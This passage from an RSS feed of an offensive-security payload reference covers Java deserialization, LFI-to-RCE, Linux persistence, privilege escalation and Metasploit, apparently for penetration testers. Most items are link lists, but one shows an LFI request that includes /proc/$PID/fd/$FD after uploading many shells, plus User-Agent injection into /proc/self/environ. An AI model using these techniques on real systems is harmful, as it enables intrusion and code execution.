&lt;h2 id="wrapper-phpfilter" class="anchored-heading"&gt;Wrapper php://filter&lt;a class="heading-anchor" href="#wrapper-phpfilter" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;The part &amp;ldquo;&lt;code&gt;php://filter&lt;/code&gt;&amp;rdquo; is case insensitive&lt;/p&gt;</description></item><item><title>Initial Access</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/initial-access/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/initial-access/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/"&gt;InternalAllTheThings/redteam/access/initial-access&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#complex-chains"&gt;Complex Chains&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#container"&gt;Container&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#payload"&gt;Payload&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#binary-files"&gt;Binary Files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#code-execution-files"&gt;Code Execution Files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#embedded-files"&gt;Embedded Files&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#code-signing"&gt;Code Signing&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Java Deserialization</title><link>https://bokkapig.pages.dev/refs/payloads/insecure-deserialization/java/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/insecure-deserialization/java/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Java serialization is the process of converting a Java object’s state into a byte stream, which can be stored or transmitted and later reconstructed (deserialized) back into the original object. Serialization in Java is primarily done using the &lt;code&gt;Serializable&lt;/code&gt; interface, which marks a class as serializable, allowing it to be saved to files, sent over a network, or transferred between JVMs.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#detection"&gt;Detection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#tools"&gt;Tools&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#ysoserial"&gt;Ysoserial&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#burp-extensions"&gt;Burp extensions using ysoserial&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#alternative-tooling"&gt;Alternative Tooling&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#yaml-deserialization"&gt;YAML Deserialization&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#viewstate"&gt;ViewState&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="detection" class="anchored-heading"&gt;Detection&lt;a class="heading-anchor" href="#detection" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;&amp;quot;AC ED 00 05&amp;quot;&lt;/code&gt; in Hex
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;AC ED&lt;/code&gt;: STREAM_MAGIC. Specifies that this is a serialization protocol.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;00 05&lt;/code&gt;: STREAM_VERSION. The serialization version.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&amp;quot;rO0&amp;quot;&lt;/code&gt; in Base64&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Content-Type&lt;/code&gt; = &amp;ldquo;application/x-java-serialized-object&amp;rdquo;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&amp;quot;H4sIAAAAAAAAAJ&amp;quot;&lt;/code&gt; in gzip(base64)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="ysoserial" class="anchored-heading"&gt;Ysoserial&lt;a class="heading-anchor" href="#ysoserial" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://github.com/frohoff/ysoserial"&gt;frohoff/ysoserial&lt;/a&gt; : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.&lt;/p&gt;</description></item><item><title>LFI to RCE</title><link>https://bokkapig.pages.dev/refs/payloads/file-inclusion/lfi-to-rce/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/file-inclusion/lfi-to-rce/</guid><description>&lt;blockquote&gt;
&lt;p&gt;LFI (Local File Inclusion) is a vulnerability that occurs when a web application includes files from the local file system, often due to insecure handling of user input. If an attacker can control the file path, they can potentially include sensitive or dangerous files such as system files (/etc/passwd), configuration files, or even malicious files that could lead to Remote Code Execution (RCE).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#lfi-to-rce-via-procfd"&gt;LFI to RCE via /proc/*/fd&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#lfi-to-rce-via-procselfenviron"&gt;LFI to RCE via /proc/self/environ&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#lfi-to-rce-via-iconv"&gt;LFI to RCE via iconv&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#lfi-to-rce-via-upload"&gt;LFI to RCE via upload&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#lfi-to-rce-via-upload-race"&gt;LFI to RCE via upload (race)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#lfi-to-rce-via-upload-findfirstfile"&gt;LFI to RCE via upload (FindFirstFile)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#lfi-to-rce-via-phpinfo"&gt;LFI to RCE via phpinfo()&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#lfi-to-rce-via-controlled-log-file"&gt;LFI to RCE via controlled log file&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#rce-via-ssh"&gt;RCE via SSH&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#rce-via-mail"&gt;RCE via Mail&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#rce-via-apache-logs"&gt;RCE via Apache logs&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#lfi-to-rce-via-php-sessions"&gt;LFI to RCE via PHP sessions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#lfi-to-rce-via-php-pearcmd"&gt;LFI to RCE via PHP PEARCMD&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#lfi-to-rce-via-credentials-files"&gt;LFI to RCE via Credentials Files&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="lfi-to-rce-via-procfd" class="anchored-heading"&gt;LFI to RCE via /proc/*/fd&lt;a class="heading-anchor" href="#lfi-to-rce-via-procfd" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;Upload a lot of shells (for example : 100)&lt;/li&gt;
&lt;li&gt;Include &lt;code&gt;/proc/$PID/fd/$FD&lt;/code&gt; where &lt;code&gt;$PID&lt;/code&gt; is the PID of the process and &lt;code&gt;$FD&lt;/code&gt; the filedescriptor. Both of them can be bruteforced.&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;example&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;index&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt;&lt;span class="k"&gt;?&lt;/span&gt;&lt;span class="n"&gt;page&lt;/span&gt;&lt;span class="p"&gt;=/&lt;/span&gt;&lt;span class="n"&gt;proc&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="nv"&gt;$PID&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="nv"&gt;$FD&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="lfi-to-rce-via-procselfenviron" class="anchored-heading"&gt;LFI to RCE via /proc/self/environ&lt;a class="heading-anchor" href="#lfi-to-rce-via-procselfenviron" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Like a log file, send the payload in the &lt;code&gt;User-Agent&lt;/code&gt; header, it will be reflected inside the &lt;code&gt;/proc/self/environ&lt;/code&gt; file&lt;/p&gt;</description></item><item><title>Linux - Evasion</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/linux-evasion/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/linux-evasion/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/"&gt;InternalAllTheThings/redteam/access/initial-access&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#file-names"&gt;File names&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#command-history"&gt;Command history&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#hiding-text"&gt;Hiding text&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#timestomping"&gt;Timestomping&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Linux - Persistence</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/linux-persistence/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/linux-persistence/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/"&gt;InternalAllTheThings/redteam/persistence/linux-persistence&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#basic-reverse-shell"&gt;Basic reverse shell&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#add-a-root-user"&gt;Add a root user&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#suid-binary"&gt;Suid Binary&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#crontab---reverse-shell"&gt;Crontab - Reverse shell&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-users-bash_rc"&gt;Backdooring a user&amp;rsquo;s bash_rc&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-startup-service"&gt;Backdooring a startup service&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-user-startup-file"&gt;Backdooring a user startup file&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-message-of-the-day"&gt;Backdooring Message of the Day&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-driver"&gt;Backdooring a driver&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-the-apt"&gt;Backdooring the APT&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-the-ssh"&gt;Backdooring the SSH&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-git"&gt;Backdooring Git&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#additional-persistence-options"&gt;Additional Linux Persistence Options&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Linux - Privilege Escalation</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/linux-privilege-escalation/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/linux-privilege-escalation/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/"&gt;InternalAllTheThings/redteam/persistence/linux-persistence&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#checklists"&gt;Checklist&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#looting-for-passwords"&gt;Looting for passwords&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#files-containing-passwords"&gt;Files containing passwords&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#old-passwords-in-etcsecurityopasswd"&gt;Old passwords in /etc/security/opasswd&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#last-edited-files"&gt;Last edited files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#in-memory-passwords"&gt;In memory passwords&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#find-sensitive-files"&gt;Find sensitive files&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#ssh-key"&gt;SSH Key&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#sensitive-files"&gt;Sensitive files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#ssh-key-predictable-prng-authorized_keys-process"&gt;SSH Key Predictable PRNG (Authorized_Keys) Process&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#scheduled-tasks"&gt;Scheduled tasks&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cron-jobs"&gt;Cron jobs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#systemd-timers"&gt;Systemd timers&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#suid"&gt;SUID&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#find-suid-binaries"&gt;Find SUID binaries&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#create-a-suid-binary"&gt;Create a SUID binary&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#capabilities"&gt;Capabilities&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#list-capabilities-of-binaries"&gt;List capabilities of binaries&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#edit-capabilities"&gt;Edit capabilities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#interesting-capabilities"&gt;Interesting capabilities&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#sudo"&gt;SUDO&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#nopasswd"&gt;NOPASSWD&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#ld_preload-and-nopasswd"&gt;LD_PRELOAD and NOPASSWD&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#doas"&gt;Doas&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#sudo_inject"&gt;sudo_inject&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2019-14287"&gt;CVE-2019-14287&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#gtfobins"&gt;GTFOBins&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#wildcard"&gt;Wildcard&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#writable-files"&gt;Writable files&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#writable-etcpasswd"&gt;Writable /etc/passwd&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#writable-etcsudoers"&gt;Writable /etc/sudoers&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#nfs-root-squashing"&gt;NFS Root Squashing&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#shared-library"&gt;Shared Library&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#ldconfig"&gt;ldconfig&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#rpath"&gt;RPATH&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#groups"&gt;Groups&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#docker"&gt;Docker&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#lxclxd"&gt;LXC/LXD&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#hijack-tmux-session"&gt;Hijack TMUX session&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#kernel-exploits"&gt;Kernel Exploits&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2022-0847-dirtypipe"&gt;CVE-2022-0847 (DirtyPipe)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2016-5195-dirtycow"&gt;CVE-2016-5195 (DirtyCow)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2010-3904-rds"&gt;CVE-2010-3904 (RDS)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2010-4258-full-nelson"&gt;CVE-2010-4258 (Full Nelson)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cve-2012-0056-mempodipper"&gt;CVE-2012-0056 (Mempodipper)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Mercurial</title><link>https://bokkapig.pages.dev/refs/payloads/insecure-source-code-management/mercurial/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/insecure-source-code-management/mercurial/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Mercurial (also known as hg from the chemical symbol for mercury) is a distributed version control system (DVCS) designed for efficiency and scalability. Developed by Matt Mackall and first released in 2005, Mercurial is known for its speed, simplicity, and ability to handle large codebases.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#tools"&gt;Tools&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#rip-hgpl"&gt;rip-hg.pl&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="rip-hgpl" class="anchored-heading"&gt;rip-hg.pl&lt;a class="heading-anchor" href="#rip-hgpl" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl"&gt;kost/dvcs-ripper/master/rip-hg.pl&lt;/a&gt; - Rip web accessible (distributed) version control systems: SVN/GIT/HG&amp;hellip;&lt;/p&gt;</description></item><item><title>Metasploit</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/metasploit-cheatsheet/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/metasploit-cheatsheet/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/"&gt;InternalAllTheThings/command-control/metasploit&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#installation"&gt;Installation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#sessions"&gt;Sessions&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#background-handler"&gt;Background handler&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#meterpreter---basic"&gt;Meterpreter - Basic&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#generate-a-meterpreter"&gt;Generate a meterpreter&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#meterpreter-webdelivery"&gt;Meterpreter Webdelivery&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#get-system"&gt;Get System&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#persistence-startup"&gt;Persistence Startup&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#network-monitoring"&gt;Network Monitoring&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#portforward"&gt;Portforward&lt;/a&gt;&lt;/li&gt;
